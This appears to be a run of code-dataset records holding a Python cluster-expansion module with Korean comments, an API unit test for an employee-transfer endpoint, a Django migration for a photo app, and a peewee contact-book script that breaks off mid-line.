GrpLst=[[0,1]] -> PermuteGrpLst=[[0]]\n #Lst=[1,2] -> GrpLst=[[0],[1]] -> PermuteGrpLst=[]\n #Lst=[1,1,2] -> GrpLst=[[0,1],[2]] -> PermuteGrpLst=[[0],[1,2]]\n #Lst=[1,2,2] -> GrpLst=[[0],[1,2]] -> PermuteGrpLst=[[0,1],[2]]\n #Lst=[1,2,1] -> GrpLst=[[0],[1],[2]] -> PermuteGrpLst=[]\n \n LstLen = len(Lst) #Lst=[1,1,2] 일 때,\n GrpLen = len(GrpLst) #GrpLst=[[0,1],[2]]\n PermuteGrp = [] #LstLen = 3\n flag = 0 #GrpLen = 2\n \n for GrpInd1, Grp1 in enumerate(GrpLst): #GrpLst=[[0,1],[2]]\n for GrpInd2 in range(GrpInd1,GrpLen):\n Grp2 = GrpLst[GrpInd2]\n PermuteGrp.append([])\n for i in Grp1: # i:[0,1] / j:[0,1],[2] -> (0,0),(0,1),(1,0),(1,1) / (0,2),(1,2)\n for j in Grp2: # j: [2] / j: [2] -> (2,2)\n PermuteGrp[flag].append((i,j)) \n if len(PermuteGrp[flag]) == 1: #B #Should have at least 1 item\n PermuteGrp.remove(PermuteGrp[flag]) # 이 중, (2,2)과 같이 한 개 뿐인 것 제거함\n else:\n flag += 1 #PermuteGrp = [ [(0,0),(0,1),(1,0),(1,1)], [(0,2),(1,2)]]\n \n PermuteGrpLst = [[] for i in range(len(PermuteGrp))]\n PermuteLst = [[] for i in range(len(PermuteGrp))]\n \n Count = 0\n for i in range(LstLen): #PermuteGrp에서 (i,j)가 몇 번째에 있는지\n for j in range(i+1,LstLen): #(i,j) = (0,1) -> (0,2) -> (1,2) -> (2,2)\n for PInd,Permute in enumerate(PermuteGrp): #Count: 0 1 2 x\n if (i,j) in Permute: #PermuteGrp:0 1 1\n PermuteGrpLst[PInd].append(Count) #PermuteGrpLst = [ [ 0 ], [ 1 , 2 ] ]\n PermuteLst[PInd].append((i,j)) #PermuteLst = [ [(0,1)], [(0,2),(1,2)] ]\n break\n Count += 1\n \n return PermuteGrpLst\n##########\n \n\n\n\n\n##########\ndef grpSort(Lst, GrpLst): \n# \"\"\"\n# Sort the Lst with certain group constaint\n# \"\"\"\n Lst0 = list(Lst)\n for Grp in GrpLst:\n if len(Grp) <= 1: #Grp=[0]\n continue #Grp가 한개면 그냥 넘어감\n \n else: #Grp=[0,1]\n SubLst = sorted([Lst0[i] for i in Grp]) #Grp가 두개 이상이면, 여기에 해당하는 Lst를 작은 순서부터 정렬\n for i, ind in enumerate(Grp): #Lst=[20,10,30] -> [10,20,30]\n Lst0[ind] = SubLst[i]\n return Lst0\n##########\n \n\n\n\n\n##########\ndef lstGrpAdd(Lst, MaxVal, GrpLst): \n# \"\"\"\n# Add one into the lst, this operation is used to when we iterate all the\n# combinations with candidate in Lst variable. In this case, the function\n# would call the next combination, the list would also be ordered in this\n# case, which means [1,2,3] is treated the same as [2,3,1] and [3,2,1].\n#\n# Args:\n# Lst: The Lst to be operated, should consist only integers, the minimum\n# of each candidate is 0, while the maximum is MaxVal\n# MaxVal: Maximum value of integers expected in each Lst element\n# \"\"\"\n\n #MaxVal=[7,7,91], GrpLst=[[0,1],[2]] 일 때,\n #Lst=[0,0,0] -> [1,0,0] -> ... -> [7,0,0]\n # [1,1,0] -> [2,1,0] -> ... -> [7,1,0]\n # [2,2,0] -> [3,2,0] -> ... -> [7,2,0] -> ... [7,7,91]\n #이런 식으로 중복되는 것 없이 리스트를 만듬\n\n LstLen = len(Lst)\n if (Lst[0] < MaxVal[0]): #Lst의 첫번째 수\n Lst[0]+=1 #Lst=[0,0,0] -> [1,0,0] -> ... -> [7,0,0] \n\n \n elif (Lst[0] == MaxVal[0]): #Lst의 첫번째 수가 MaxVal에 도달했으면\n NotFullInd = LstLen - 1 \n\n for i in range(1,LstLen): #Lst 중 MaxVal에 도달하지 못한 첫번째 index 찾아서 1을 더함\n if (Lst[i] != MaxVal[i]):\n NotFullInd = i \n break #NotFullInd=1\n Lst[NotFullInd] += 1 #Lst=[7,0,0] -> [7,1,0]\n \n #B #Find the belonging group of NotFullInd\n for GrpInd, Grp in enumerate(GrpLst): \n if NotFullInd in Grp: \n ChgInd=GrpInd \n break\n \n for i in range(NotFullInd):\n if i in GrpLst[ChgInd]: #NotFullInd=1가 Grp=[0,1]에 있다면, Lst의 앞 숫자에 뒤 숫자를 넣음\n Lst[i] = Lst[NotFullInd] #Lst=[7,1,0] -> [1,1,0]\n else: #NotFullInd=2가 Grp=[2]에 있다면, Lst의 앞 숫자에 0을 넣음\n Lst[i] = 0 #Lst=[7,7,1] -> [0,0,1]\n return Lst\n##########\n\n\n\n\n\n##########\ndef lstOrderAdd(Lst, MaxVal):\n# \"\"\"\n# Add one into the lst, this operation is used to when we iterate all the\n# combinations with candidate in Lst variable. In this case, the function\n# would call the next combination, the list would also be ordered in this\n# case, which means [1,2,3] is treated the same as [2,3,1] and [3,2,1].\n#\n# Args:\n# Lst: The Lst to be operated, should consist only integers, the minimum\n# of each candidate is 0, while the maximum is MaxVal\n# MaxVal: Maximum value of integers expected in each Lst element\n# \"\"\"\n \n LstLen = len(Lst)\n \n if (Lst[0] < MaxVal[0]):\n Lst[0]+=1\n \n elif (Lst[0] == MaxVal[0]):\n NotFullInd = LstLen - 1\n \n for i in range(1,LstLen):\n if (Lst[i] != MaxVal[i]):\n NotFullInd = i\n break \n Lst[NotFullInd] += 1\n \n for i in range(NotFullInd):\n Lst[i] = Lst[NotFullInd]\n\n return Lst\n##########\n\n\n\n\n\n##########\ndef listPermute(Lst):\n# '''\n# Create permution with the consideration of degree of freedom\n# '''\n \n #[2,3] -> [2],[3]\n #[2,3],[2,3] -> [2,2],[3,2],[3,3]\n #[2,3],[4,5] -> [2,4],[3,4],[2,5],[3,5]\n\n PermuteLst = []\n Lstlen = len(Lst)\n LstItemInd = [0]*Lstlen\n MaxItemInd = [0]*Lstlen\n \n for Ind, LstItem in enumerate(Lst):\n MaxItemInd[Ind] = len(LstItem) - 1\n\n GrpLst = findGrpLst(Lst)\n while (LstItemInd[-1]<=MaxItemInd[-1]):\n ItemLst = []\n for i, Ind in enumerate(LstItemInd):\n ItemLst.append(Lst[i][Ind])\n PermuteLst.append(ItemLst)\n LstItemInd = lstGrpAdd(LstItemInd, MaxItemInd, GrpLst)\n \n return PermuteLst\n##########\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n##########\n#@def ceFind(SubLatt, POSRef, NCut=3, Isprint=0, DCut='default'):\ndef ceFind(SubLatt, POSRef, NCut, DCut, Isprint=0): #!\n# '''\n# Method to find the clusters with a given reference lattice\n#\n# Args:\n# SubLatt: the projection of solid solution into reference lattice\n# something like [[0,1],[1,2],[3,4]];\n# POSRef: POSCAR dictionary for reference lattice\n# NCut: Cutoff size of clusters (default: 3)\n# DCut: Cutoff length of each dimension of the cluster \n# (default: Half of the box size)\n# '''\n \n #@print('#############################################################')\n if DCut == 'default':\n DCut = 100.0\n TS = 0.3\n for i in range(3):\n DMax = max(POSRef['Base'][i])/2.0 + TS\n if DMax < DCut:\n DCut = DMax\n #@print('Cutoff cluster length is %f A' %DCut)\n \n NSubLatt = POSRef['EleNum'] #NSubLatt=3, (A,B,O three sublattices)\n ClusterDesLst = []\n PrimDistLst = []\n AllPrimLattLst = []\n ClusterNum = []\n IndMax = max(SubLatt[-1]) #SubLatt=[[0],[1,2],[3,4]] -> IndMax=4\n\n FreeSubLatt = []\n FreePrim = []\n for i in range(NSubLatt): #SubLatt = [ [0], [1,2], [3,4]]\n if len(SubLatt[i]) == 1: #!\n FreeSubLatt.append(SubLatt[i][0:-1]) #!\n if len(SubLatt[i]) > 1: # 0 1 2\n FreePrim.append(i) #FreePrim = [ 1 , 2 ]\n FreeSubLatt.append(SubLatt[i]) #!\n #@FreeSubLatt.append(SubLatt[i][0:-1]) #B #Get rid of last one #FreeSubLatt = [ [], [1] , [3] ]\n \n NFreePrim = len(FreePrim)\n NFreeSubLatt = len(FreeSubLatt)\n FreePrim = np.array(FreePrim) #NFreePrim=2\n FreeSubLatt = np.array(FreeSubLatt) #NFreeSubLatt=3\n #B #print(NFreePrim,NFreeSubLatt,FreePrim,FreeSubLatt);\n\n for N in range(2,NCut+1): #2개 이상의 원자로 이루어진 cluster\n PrimIndLst = [0]*N \n PrimDistLst.append([])\n AllPrimLattLst.append([])\n while (PrimIndLst[-1]<=NFreePrim-1): #PrimIndLst=[0,0]->[1,0]->[1,1]\n #B #print(PrimIndLst);\n PrimLattLst = list(FreePrim[PrimIndLst]) #PrimLattLst=[1,1]->[2,1]->[2,2]\n AllPrimLattLst[N-2].append(PrimLattLst) #AllPrimLattLst=[[1,1],[2,1],[2,2]]\n # =[[1,1,1],[2,1,1],[2,2,1],[2,2,2]]\n DistLst = findCluster(POSRef,PrimLattLst,DCut)\n \n PrimDistLst[N-2].append(DistLst) #PrimDistLst=[ [1,1]거리, [2,1]거리, [2,2]거리 ]\n PrimIndLst=lstOrderAdd(PrimIndLst,[NFreePrim-1]*N) # =[ [1,1,1]거리,[2,1,1]거리,[2,2,1]거리,[2,2,2]거리 ]\n \n #@print('The Distance list of primary lattice is '+str(PrimDistLst))\n #@print('The cluster made from primary lattice is '+str(AllPrimLattLst))\n\n\n\n ClusterDesLst.append([])\n ClusterNum.append(0)\n for SubLatt in FreeSubLatt: #1개의 원자로 이루어진 cluster\n if SubLatt:\n #@print(SubLatt)\n for Latt in SubLatt:\n #@ClusterDesLst[0].append([Latt]) #ClusterDesLst[0]=[[1],[3]]\n ClusterDesLst[0].append([[Latt]]) #!\n ClusterNum[0] += 1 #ClusterNum[0]=2\n #B #print(ClusterDesLst);\n\n\n \n for N in range(2,NCut+1): #2개 이상의 원자로 이루어진 cluster\n IndLst = [0]*N\n ClusterDesLst.append([])\n ClusterNum.append(0)\n \n while (IndLst[-1]<=NFreeSubLatt-1):\n LattLst = list(FreeSubLatt[IndLst]) #LattLst=[ [], []]->[[1], []]->[[3], []]->\n # =[[1],[1]]->[[3],[1]]->[[3],[3]]->\n if not [] in LattLst: # = ... -> [[1],[1],[1]] -> ...\n #B #print('LattLst = '+str(LattLst));\n PrimLattLst = [0]*N\n for LattInd, Latt in enumerate(LattLst):\n if Latt in list(FreeSubLatt): \n SubInd = list(FreeSubLatt).index(Latt)\n PrimLattLst[LattInd] = SubInd #LattLst=[[1],[1]] -> PrimLattLst=[1,1]\n else:\n print('Cannot Latt in FreeSubLatt!!!')\n #@print('PrimLattLst = '+str(PrimLattLst))\n \n if PrimLattLst in AllPrimLattLst[N-2]:\n PrimInd = AllPrimLattLst[N-2].index(PrimLattLst)\n DistLst = PrimDistLst[N-2][PrimInd] #DistLst: LattLst에 해당하는 거리 정보\n else:\n print('Cannot find the relevant PrimLattLst!!!')\n break\n \n for Dist in DistLst: #LattLst, DisLst를 ��아서 Cluster 만듬\n PermuteLattLst = listPermute(LattLst)\n for PermuteLst in PermuteLattLst:\n Dist = [round(elem,2) for elem in Dist] #!\n Cluster = [PermuteLst,Dist]\n if not Cluster in ClusterDesLst[N-2]:\n ClusterDesLst[N-1].append(Cluster)\n ClusterNum[N-1] += 1\n \n IndLst = lstOrderAdd(IndLst,[NFreeSubLatt-1]*N) #B #Next one\n ClusterSum = sum(ClusterNum)\n #@print('#############################################################')\n\n if (Isprint):\n #@print('#############################################################')\n print('%i indepedent Clusters have been found in this structure' %(ClusterSum))\n for N in range(1,NCut+1):\n print('%i Clusters with %i atoms is given below:' %(ClusterNum[N-1], N))\n ClusterStr = ''\n for Cluster in ClusterDesLst[N-1]:\n ClusterStr+=str(Cluster)\n #@ClusterStr+='\\t'\n ClusterStr+='\\n' #!\n print(ClusterStr)\n #@print('#############################################################')\n\n return ClusterSum, ClusterNum, ClusterDesLst\n##########\n\n\n\n\n\n##########\ndef findCluster(POSRef, LattLst, DCut):\n# '''\n# Find the Distance Lst for a given PrimAtomLst\n#\n# Args:\n# POSRef: dictionary of POSRef\n# PrimAtomLst: atom list in PrimAtomLst\n# DCut: Cutoff distance of\n#\n# '''\n \n NLst = len(LattLst) #LattLst = [2,1], [O,B] 일 때\n IndLst = [0]*NLst #IndLst = [0,0] -> [1,0] -> ... -> [95,0] ->\n GIndLst = [0]*NLst # [1,1] -> ... -> [95,1] ->\n #@TS = 0.05*NLst\n TS = 0.1 #!\n DistLst = []\n IndLstMax = []\n \n for i in range(NLst):\n IndLstMax.append(POSRef['AtomNum'][LattLst[i]]-1) #IndLstMax = [95,31], LattLst에 해당하는 원자 개수 -1\n\n while (IndLst[-1]<=IndLstMax[-1]):\n for i, Ind in enumerate(IndLst):\n #@Indtmp = LattLst[i] - 1\n Indtmp = LattLst[i] #!\n GIndLst[i] = Ind + sum(POSRef['AtomNum'][0:Indtmp]) #GIndLst = [64,32] -> [65,32] -> ...\n \n Dist = []\n #@GrpLst = MathKit.findGrpLst(LattLst)\n for i in range(NLst):\n for j in range(i+1,NLst):\n Distmp = POSRef['dismat'][GIndLst[i]][GIndLst[j]]\n Dist.append(Distmp)\n \n GrpLst = findGrpLst(LattLst) #!\n PermuteGrpLst = grporderPermute(LattLst,GrpLst)\n Dist = grpSort(Dist,PermuteGrpLst)\n \n flag = 1\n for Disttmp in DistLst:\n Distmp = grpSort(Disttmp,PermuteGrpLst)\n #@DistDiff = sum(abs(np.array(Dist)-np.array(Disttmp)))\n DistDiff = sum(abs(np.array(Dist)-np.array(Distmp))) #!\n if (DistDiff < TS):\n flag = 0\n if (min(Dist) > 0) & (max(Dist) < DCut) & flag:\n DistLst.append(Dist)\n \n #@GrpLst = MathKit.findGrpLst(LattLst)\n IndLst = lstGrpAdd(IndLst,IndLstMax,GrpLst)\n\n return DistLst\n##########\n\n\n\n\n\n##########\n#@def clustercount1(Clusterdes, POS, TS=0.2):\ndef clustercount1(Clusterdes, POS, TS=0.1):\n# '''\n# enumerate and count clusters in a given lattce, this version is cleaner\n# and more robust than the method below: clustercount\n#\n# Args:\n# Clusterdes: Cluster description, in the format of list, somthing\n# like [[[0,1,2],[2.6,2.7,2.8]],[[1,1],[2.5]],[[2]]]\n# POS: Dictionary containing the position information, in the format of POSCAR\n# TS: Allowed variation of cluster bond length\n# Outputs: ClusterLst, which is a list with all the description of indentified\n# clusters as specified in Clusterdes\n# '''\n\n # Sr Fe O Ti\n # ClusterDes = [ [[1]], [[1,2],[2.0]], [[1,1,2],[3.9,2.1,1.9]] ]\n \n ClusterNum = len(Clusterdes)\n ClusterLst = [[] for i in range(ClusterNum)]\n SumLst = [sum(POS['AtomNum'][0:i]) for i in range(POS['EleNum'])] #SumLst = [0,32,40,132] (각 원자의 시작 번호)\n\n for CInd, Cluster in enumerate(Clusterdes):\n CSize = len(Cluster[0]) #B #Cluster Size \n\n if CSize == 1: #clustercount랑 같음\n for i in range(POS['AtomNum'][Cluster[0][0]]):\n GInd = i + sum(POS['AtomNum'][0:Cluster[0][0]])\n ClusterLst[CInd].append([GInd])\n \n else: #여기부터 clustercount보다 개선됨\n IndLst = [0]*CSize #Cluster = [[1,1,2],[3.9,2.1,1.9]] 일 때\n IndLstMax = []\n GIndLst = [0]*CSize\n GrpLst = findGrpLst(Cluster[0]) #GrpLst = [[0,1],[2]]\n PermuteLst = grporderPermute(Cluster[0],GrpLst) #PermuteLst = [[0],[1,2]]\n DistRef = grpSort(Cluster[1],PermuteLst) #DistRef = [3.9,1.9,2.1]\n \n for Ele in Cluster[0]: \n IndLstMax.append(POS['AtomNum'][Ele] - 1) #IndLstMax = [7,7,91] (cluster를 구성하는 각 원자의 개수 - 1)\n \n if -1 in IndLstMax: #!\n continue #!\n \n while (IndLst[-1] <= IndLstMax[-1]):\n \n for i, Ind in enumerate(IndLst): \n GIndLst[i] = Ind + SumLst[Cluster[0][i]] #GIndLst = [32,32,40] -> [33,32,40] -> ...\n\n Dist = []\n for i in range(CSize): #GIndLst에 해당하는 원자 사이의 거리\n for j in range(i+1,CSize):\n Dist.append(POS['dismat'][GIndLst[i]][GIndLst[j]])\n \n flag = 1 \n Dist = grpSort(Dist,PermuteLst)\n for Dind,D in enumerate(Dist):\n if abs(D - DistRef[Dind]) > TS: #|원자 사이 거리 - 설정| > 0.2\n flag = 0\n break\n if flag:\n ClusterLst[CInd].append(list(GIndLst))\n \n lstGrpAdd(IndLst,IndLstMax,GrpLst) #IndLst = [0,0,0] -> [1,0,0] -> ...\n\n return ClusterLst\n##########\n\n\n\n\n\n##########\ndef countCluster(ClusterLst):\n ClusterCount = []\n for i in range(len(ClusterLst)):\n #B #print('ClusterLst='+str(ClusterLst[i]))\n ClusterCount.append(len(ClusterLst[i])) #ClusterLst의 각 cluster 수를 셈\n return ClusterCount\n##########\n \n\n\n\n\n##########\ndef clusterE(ClusterLst, ClusterCoef):\n# '''\n# Calculate total energy\n#\n# Args:\n# ClusterLst: List of indentified clusters\n# ClusterCoef: ECI of each cluster\n# '''\n \n #B #ClusterCount = [];\n #B #for i in range(len(ClusterLst)):\n #B # ClusterCount.append(len(ClusterLst[i]));\n ClusterCount = countCluster(ClusterLst);\n #B #print ClusterCount,ClusterCoef, len(ClusterCount), len(ClusterCoef);\n \n ECE = 0.0;\n ECE = ECE + ClusterCoef[0]; #ClusterCoef[0]: constant\n #B #print ECE;\n for i in range(len(ClusterCount)):\n ECE = ECE + ClusterCount[i]*ClusterCoef[i+1];\n #B #print ECE\n return ECE\n##########\n\n\n\n\n\n##########\ndef dismatswap(dismat, Ind1, Ind2): #dismat: 전체 원자 사이의 거리 정보, Ind1/Ind2: 바꿀 두 원자\n# '''\n# Update the distance matrix\n#\n# Args:\n# dismat: distance matrix\n# Ind1, Ind2: the indexes of two atoms that swap positions\n# '''\n \n lendismat = len(dismat[1]) #lendismat: 전체 원자 개수\n\n tmp = dismat[Ind1][:] #Ind1, Ind2 두 원자 사이의 거리 정보 바꿈\n dismat[Ind1][:] = dismat[Ind2][:] #(Ind1, 다른원자) -> (Ind2, 다른원자)\n dismat[Ind2][:] = tmp #(Ind1, Ind2) -> (Ind2, Ind2), 뒤에서 더 처리함\n\n for i in range(len(dismat[1])): #Ind1, Ind2 두 원자가 아닌 다른 원자들의 거리 정보 바꿈\n if (i!=Ind1)&(i!=Ind2): #(다른원자, Ind1) -> (다른원자, Ind2)\n dismat[i][Ind1] = dismat[Ind1][i]\n dismat[i][Ind2] = dismat[Ind2][i]\n \n tmp = dismat[Ind1][Ind2] #(Ind1, Ind2) -> (Ind2, Ind2) -> (Ind2, Ind1), 여기서 완성됨\n dismat[Ind1][Ind2] = dismat[Ind1][Ind1]\n dismat[Ind1][Ind1] = tmp\n \n tmp = dismat[Ind2][Ind1]\n dismat[Ind2][Ind1] = dismat[Ind2][Ind2]\n dismat[Ind2][Ind2] = tmp\n\n return dismat\n##########\n\n\n\n\n\n##########\n#@def clusterswap1(ClusterDes, POS, ClusterLst, Atom1, Atom2, Ind1, Ind2, TS=0.2):\ndef clusterswap1(ClusterDes, POS, ClusterLst, Atom1, Atom2, Ind1, Ind2, TS=0.1):\n# '''\n# Update the cluster information after swapping atoms\n# This is a cleaner and more robust version of clusterswap method below\n#\n# Args:\n# ClusterDes: Description about clusters\n# POS: POSCAR dictionary\n# ClusterLst: Cluster information\n# Atom1, Atom2: Atom sublattice\n# Ind1, Ind2: Atom indices\n# '''\n \n ClusterNum = len(ClusterLst)\n SumLst = [sum(POS['AtomNum'][0:i]) for i in range(POS['EleNum'])]\n\n ClusterLst_cp = copy.deepcopy(ClusterLst) #!\n for LstInd, Lst in enumerate(ClusterLst):\n for Ind, AtomInd in enumerate(Lst):\n if (Ind1 in AtomInd) | (Ind2 in AtomInd):\n #@ClusterLst[LstInd].remove(AtomInd)\n ClusterLst_cp[LstInd].remove(AtomInd) #!\n ClusterLst = copy.deepcopy(ClusterLst_cp) #!\n\n for CInd, Cluster in enumerate(ClusterDes):\n CSize = len(Cluster[0])\n \n if (CSize==1) & (Atom1==Cluster[0][0]):\n #@ClusterLst[ClusterInd].append([Ind1])\n ClusterLst[CInd].append([Ind1]) #!\n \n elif (CSize==1) & (Atom2==Cluster[0][0]):\n #@ClusterLst[ClusterInd].append([Ind2])\n ClusterLst[CInd].append([Ind2]) #!\n \n else:\n for AtomI, Atom in enumerate([Atom1, Atom2]): #O <-> VO, Atom1=3(O), Atom2=4(VO)\n if Atom in Cluster[0]: #Cluster = [2,3,3]인 경우, [Fe,O,O]\n \n AtomInd = [Ind1,Ind2][AtomI] #AtomInd: 바뀐 O 원자 번호\n AtomLoc = Cluster[0].index(Atom) #AtomLoc=1, Atom1=3이 Cluster=[2,3,3]중 몇 번째인지\n IndLst = [0]*(CSize-1)\n IndLstMax = []\n GIndLst = [0]*(CSize-1)\n \n GrpLst = findGrpLst(Cluster[0])\n PermuteLst = grporderPermute(Cluster[0],GrpLst)\n DistRef = grpSort(Cluster[1],PermuteLst)\n \n ClusterTmp = copy.deepcopy(Cluster[0]) #Cluster=[2,3,3]에서 Atom1=3을 뺀다\n ClusterTmp.remove(Atom) #ClusterTmp = [2,3]\n GrpLst_tmp = findGrpLst(ClusterTmp) #!\n \n for Ele in ClusterTmp:\n IndLstMax.append(POS['AtomNum'][Ele] - 1) #IndLstMax = [7,91]\n \n while (IndLst[-1] <= IndLstMax[-1]):\n for i, Ind in enumerate(IndLst):\n #@GIndLst[i] = Ind + SumLst[Cluster[0][i]] \n GIndLst[i] = Ind + SumLst[ClusterTmp[i]] #! #GIndLst=[56,64]\n GIndLst.insert(AtomLoc,AtomInd) #GIndLst=[56,바뀐 O 원자,64]\n GIndLst = grpSort(GIndLst,GrpLst)\n\n Dist = []\n for i in range(CSize):\n for j in range(i+1,CSize):\n Dist.append(POS['dismat'][GIndLst[i]][GIndLst[j]])\n\n flag = 1\n Dist = grpSort(Dist,PermuteLst)\n for Dind, D in enumerate(Dist):\n #@if abs (D - DistRef[ind]) > TS:\n if abs (D - DistRef[Dind]) > TS: #!\n flag = 0\n break\n if flag:\n #@ClusterLst[CInd].append(list(GIndLst))\n if GIndLst not in ClusterLst[CInd]: #!\n ClusterLst[CInd].append(GIndLst) #!\n \n GIndLst = [0]*(CSize-1) #!\n #@MathKit.lstGrpAdd(IndLst,IndLstMax,GrpLst)\n lstGrpAdd(IndLst,IndLstMax,GrpLst_tmp) #!\n\n return ClusterLst\n##########","sub_path":"12_DO_Calculation/1_delta_0/DVO_0125/DVO_0125_1/Script/module_cediff.py","file_name":"module_cediff.py","file_ext":"py","file_size_in_byte":36597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"234538387","text":"# -*- coding: utf-8 -*-\nfrom API.base_api import check_response_data\nfrom API.wbs.base_wbs_api import WBSAPIBaseTestMixin\nimport unittest\nimport time\nimport pytest\nfrom nose.plugins.attrib import attr\nfrom API.wbs import execute_mysql\n\n\n@attr('issues')\n#@attr('internal')\n#@attr('external')\nclass EmpTransitionTest(WBSAPIBaseTestMixin, unittest.TestCase):\n view_url = 'employee/empTransition.json'\n\n expected_response_format = {\n \"success\": bool,\n \"msg\": unicode\n }\n\n valid_time = time.strftime('%Y-%m-%d', time.localtime(time.time()+86400))\n\n @classmethod\n def clear_transition_record(cls):\n inst = execute_mysql.ExecuteMysql()\n cls.result = inst.execute_select_sql('select * from emp_transition where empId=\"322\";')\n if cls.result:\n inst.execute_delete_sql('delete from emp_transition where empId=\"322\";')\n\n @check_response_data\n def test_response_with_successful_workflow(self):\n self.maxDiff = None\n # self.response = self.do_request(self.data)\n self.expected_response = {\n \"success\": True,\n \"msg\": u'操作成功',\n \"errorCode\": None\n }\n\n @classmethod\n def setUpClass(cls):\n cls.clear_transition_record()\n\n cls.data = 'data={' \\\n '\"token\":'+ cls.generate_token() + ',' \\\n '\"param\":{' \\\n '\"empId\":\"322\",' \\\n '\"deptId\":\"7\",' \\\n '\"effectDate\":\"' + cls.valid_time + '\"'\\\n '},\"sign\":\"354d13a6f4f2e8ff58a5d93a757c1bae\"}'\n super(EmpTransitionTest, cls).setUpClass()\n\n\n@pytest.mark.issues\n#@pytest.mark.externalapi\nclass EmpTransitionAbnormalTest(WBSAPIBaseTestMixin, unittest.TestCase):\n view_url = 'employee/empTransition.json'\n\n expected_response_format = {\n \"success\": bool,\n \"msg\": unicode\n }\n\n @check_response_data\n def test_response_with_date_error(self):\n self.maxDiff = None\n self.response = self.do_request(self.data)\n self.expected_response = {\n \"success\": False,\n \"msg\": u\"异动生效日期应大于系统当前日期!\",\n \"errorCode\": None,\n }\n\n @classmethod\n def setUpClass(cls):\n cls.data = 'data={' \\\n '\"token\":' + cls.generate_token() + ',' \\\n '\"param\":{' \\\n '\"empId\":\"138\",' \\\n '\"deptId\": \"7\",' \\\n '\"effectDate\":\"2017-08-3\"' \\\n '},' \\\n '\"sign\":\"354d13a6f4f2e8ff58a5d93a757c1bae\"' \\\n '}'\n super(EmpTransitionAbnormalTest, cls).setUpClass()\n\n","sub_path":"automation-testing/API/wbs/saas/employee/tests_empTransition.py","file_name":"tests_empTransition.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"95772437","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Album',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=20)),\n ('description', models.CharField(max_length=140)),\n ('date_uploaded', models.DateField(auto_now_add=True)),\n ('date_modified', models.DateField(auto_now=True)),\n ('date_published', models.DateField()),\n ('published', models.CharField(default=b'private', max_length=7, choices=[(b'private', b'Private Photo'), (b'shared', b'Shared Photo'), (b'public', b'Public Photo')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ImagrUser',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),\n ('our_date_joined_field', models.DateField(auto_now_add=True)),\n ('our_is_active_field', models.BooleanField(default=False)),\n ('followers', models.ManyToManyField(related_name='followers_rel_+', to='imagr_app.ImagrUser')),\n ('following', models.ManyToManyField(related_name='following_rel_+', to='imagr_app.ImagrUser')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=20)),\n ('description', models.CharField(max_length=140)),\n ('date_uploaded', models.DateField(auto_now_add=True)),\n ('date_modified', models.DateField(auto_now=True)),\n ('date_published', models.DateField()),\n ('published', models.CharField(default=b'private', max_length=7, choices=[(b'private', b'Private Photo'), (b'shared', b'Shared Photo'), (b'public', b'Public Photo')])),\n ('user', models.ForeignKey(to='imagr_app.ImagrUser')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='album',\n name='cover',\n field=models.ForeignKey(related_name='Album_cover', to='imagr_app.Photo'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='album',\n name='photos',\n field=models.ManyToManyField(related_name='Album_photos', to='imagr_app.Photo'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='album',\n name='user',\n field=models.ForeignKey(to='imagr_app.ImagrUser'),\n preserve_default=True,\n ),\n ]\n","sub_path":"imagr_site/imagr_app/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"442870383","text":"from peewee import Model, CharField, DateField, PostgresqlDatabase\nimport psycopg2\nfrom datetime import date\nimport os\n\n\n\ndb = PostgresqlDatabase('contact_book', user='postgres', password='',\n host='localhost', port=5432)\n\nclass BaseModel(Model):\n class Meta:\n database = db\n\nclass Person(BaseModel): \n first_name = CharField()\n last_name = CharField()\n phone_number = CharField()\n email = CharField()\n birthday = DateField()\n\ndb.connect()\ndb.drop_tables([Person])\ndb.create_tables([Person])\n\n# Populating the SQL Database\nLevani = Person(first_name = 'Levani', last_name = 'Papashvili',\n phone_number = '249-943-0303', email = 'levani@mail.com', birthday = '11/11/1984')\nLevani.save()\nCharlie = Person(first_name = 'Charlie', last_name='Smith',\n phone_number = '555-555-2524', email = 'charliedo@gmail.com', birthday = '03/09/85' )\nCharlie.save()\nSara = Person(first_name = 'Sara', last_name ='Ross',\n phone_number = '434-023-2313', email = 'saralalal@yahoo.com', birthday = '04/22/75')\nSara.save()\nLilly = Person(\n first_name = 'Lilly',\n last_name = 'Tighe',\n phone_number = '555-555-5053',\n email = 'princess@gmail.com',\n birthday = '11/13/1999'\n)\nLilly.save()\nBailey = Person(\n first_name = 'Bailey',\n last_name = 'Delin',\n phone_number = '555-240-0443',\n email = 'bobbyb@mail.com',\n birthday = '10/30/2002'\n)\nBailey.save()\nJeremy = Person(\n first_name = 'Jeremy',\n last_name = 'Johnson',\n phone_number = '555-980-6578',\n email = 'jeremypa@mail.com',\n birthday = '09/24/1982'\n)\nJeremy.save()\nGio = Person(\n first_name = 'Gio',\n last_name = 'Niparishvili',\n phone_number = '987-340-1429',\n email = 'gionb@mail.com',\n birthday = '06/07/1986'\n)\nGio.save()\nLia = Person(\n first_name = 'Lia',\n last_name = 'Rusishvili',\n phone_number = '545-340-9842',\n email = 'liarus@mail.com',\n birthday = '11/04/1785'\n)\nLia.save()\nOmari = Person(\n first_name = 